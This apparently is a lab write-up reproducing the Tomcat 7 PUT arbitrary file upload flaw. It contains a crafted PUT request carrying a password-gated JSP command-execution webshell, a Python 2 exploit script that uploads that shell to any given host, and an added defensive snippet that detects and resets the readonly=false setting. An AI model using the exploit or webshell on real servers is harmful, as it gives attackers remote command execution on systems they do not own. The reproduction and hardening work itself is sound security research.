Today I reproduced a Tomcat 7 arbitrary file upload vulnerability: after reading Daniel's analysis, I set up a local environment and retested it myself.
The affected Tomcat versions are 7.0.0 through 7.0.81.
I downloaded Tomcat 7.0.56 for the local test.
Test process:
1. Download a Tomcat 7.0.0-7.0.81 release. After extracting it, edit conf/web.xml and add the readonly init parameter to the default servlet with the value false.
As shown in the figure:
Then start Tomcat.
2. Upload the webshell
Use Burp Suite to send the crafted PUT request carrying the webshell.
The request contents are as follows:
PUT /123.jsp/ HTTP/1.1
Host: 192.168.23.209:8080
User-Agent: jntass
DNT: 1
Connection: close
Content-Length: 664

<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%>
<%!
public static String excuteCmd(String c) {
    StringBuilder line = new StringBuilder();
    try {
        Process pro = Runtime.getRuntime().exec(c);
        BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));
        String temp = null;
        while ((temp = buf.readLine()) != null) {
            line.append(temp + "\n");
        }
        buf.close();
    } catch (Exception e) {
        line.append(e.getMessage());
    }
    return line.toString();
}
%>
<%
if ("023".equals(request.getParameter("pwd")) && !"".equals(request.getParameter("cmd"))) {
    out.println("<pre>" + excuteCmd(request.getParameter("cmd")) + "</pre>");
} else {
    out.println(":-)");
}
%>
This is Daniel's Python PoC script (Python 2, using httplib):
#! -*- coding: utf-8 -*-
import httplib
import sys
import time

# Same JSP webshell as in the request above
BODY = '''<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%>
<%!
public static String excuteCmd(String c) {
    StringBuilder line = new StringBuilder();
    try {
        Process pro = Runtime.getRuntime().exec(c);
        BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));
        String temp = null;
        while ((temp = buf.readLine()) != null) {
            line.append(temp + "\\n");
        }
        buf.close();
    } catch (Exception e) {
        line.append(e.getMessage());
    }
    return line.toString();
}
%>
<%
if ("023".equals(request.getParameter("pwd")) && !"".equals(request.getParameter("cmd"))) {
    out.println("<pre>" + excuteCmd(request.getParameter("cmd")) + "</pre>");
} else {
    out.println(":-)");
}
%>'''

try:
    # First ask the server which methods it allows; httplib lowercases header names
    conn = httplib.HTTPConnection(sys.argv[1])
    conn.request(method='OPTIONS', url='/ffffzz')
    headers = dict(conn.getresponse().getheaders())
    if 'allow' in headers and headers['allow'].find('PUT') > 0:
        conn.close()
        conn = httplib.HTTPConnection(sys.argv[1])
        url = '/' + str(int(time.time())) + '.jsp/'
        #url = '/' + str(int(time.time())) + '.jsp::$DATA'
        conn.request(method='PUT', url=url, body=BODY)
        res = conn.getresponse()
        if res.status == 201:
            #print 'Shell: ', 'http://' + sys.argv[1] + url[:-7]
            print 'Shell: ', 'http://' + sys.argv[1] + url[:-1]
        elif res.status == 204:
            print 'File exists'
        else:
            print 'Error'
        conn.close()
    else:
        print 'Server not vulnerable'
except Exception, e:
    print 'Error: ', e
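As an added defensive check that is not part of the original write-up or Daniel's script: this Python 3 snippet audits a Tomcat conf/web.xml for the readonly=false setting on the DefaultServlet that step 1 introduces (the precondition for the PUT upload), and rewrites it back to true. The web.xml below is a constructed sample, not a real Tomcat file.

```python
import xml.etree.ElementTree as ET

# Constructed sample modelled on the step-1 change (readonly=false); not a real file.
SAMPLE_WEB_XML = """<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="3.1">
  <servlet>
    <servlet-name>default</servlet-name>
    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
    <init-param><param-name>debug</param-name><param-value>0</param-value></init-param>
    <init-param><param-name>readonly</param-name><param-value>false</param-value></init-param>
  </servlet>
</web-app>
"""

def _local(tag):  # strip the XML namespace so tags compare as plain names
    return tag.rsplit("}", 1)[-1]

def _find_default_servlet(root):
    for servlet in root.iter():
        if _local(servlet.tag) != "servlet":
            continue
        cls = "".join(c.text or "" for c in servlet if _local(c.tag) == "servlet-class")
        if cls.strip().endswith(".DefaultServlet"):
            return servlet
    return None

def _readonly_value_element(servlet):
    # The <param-value> element of the readonly init-param, or None if absent.
    for param in servlet:
        if _local(param.tag) != "init-param":
            continue
        names = [c.text or "" for c in param if _local(c.tag) == "param-name"]
        values = [c for c in param if _local(c.tag) == "param-value"]
        if names and values and names[0].strip() == "readonly":
            return values[0]
    return None

def default_servlet_writable(xml_text):
    """True only if readonly is explicitly false; Tomcat's default is true (safe)."""
    servlet = _find_default_servlet(ET.fromstring(xml_text))
    if servlet is None:
        return False
    value = _readonly_value_element(servlet)
    return value is not None and (value.text or "").strip().lower() == "false"

def harden(xml_text):
    """Return the web.xml text with the DefaultServlet forced back to readonly=true."""
    root = ET.fromstring(xml_text)
    servlet = _find_default_servlet(root)
    if servlet is not None and _readonly_value_element(servlet) is not None:
        _readonly_value_element(servlet).text = "true"
    return ET.tostring(root, encoding="unicode")
```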